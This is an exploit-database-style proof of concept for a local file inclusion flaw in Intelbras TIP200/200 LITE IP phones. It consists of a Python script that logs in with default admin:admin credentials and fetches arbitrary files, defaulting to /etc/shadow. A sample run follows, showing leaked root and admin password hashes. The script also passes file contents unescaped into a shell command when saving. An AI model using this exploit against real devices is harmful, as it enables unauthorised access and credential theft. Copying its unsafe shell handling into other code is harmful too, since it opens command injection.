# Exploit Title: [INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include] # Google Dork: [] # Date: 16/03/2018 # Exploit Author: [Matheus Goncalves - anhax0r] # Vendor Homepage: [https://www.facebook.com/anhaxteam/] # Software Link: [] # Version: [] (REQUIRED) # Tested on: [Debian] # CVE : [if applicable] #Remember that you need login with admin credentials to download files !!! in this case, i used default credentials import requests as http import subprocess import os from requests.auth import HTTPBasicAuth def poc(): print(""" ------------------------------------------------------------------------------------------------------------- ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download------------------- ------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team ------------------- -------------------------------------------------------------------------------------------------------------\n""") filename = raw_input("filename Ex: /etc/shadow: -> ") if(filename == ""): filename="/etc/shadow" r = http.get(""+str(filename), auth=HTTPBasicAuth('admin', 'admin')) print(" ") text = r.text print(text) savefile = raw_input("Save file? [Y\\n]: ") savefile.upper() if(savefile=="Y" or savefile=="y"): os.system("echo '"+text+"' > "+filename.replace("/etc/", "")) print("File saved !!") start() else: start() def start(): poc() start() #root@hax:~/itscanner# python p0c.py # ------------------------------------------------------------------------------------------------------------- # ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |------------------- # ------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team ------------------- # ------------------------------------------------------------------------------------------------------------- #filename Ex: /etc/shadow: -> /etc/shadow #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7::: #admin:DP7Kg4tE0Y9rs:11876:0:99999:7::: #Save file? [Y\n]: y #File saved !! #root@hax:~/itscanner# cat shadow #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7::: #admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::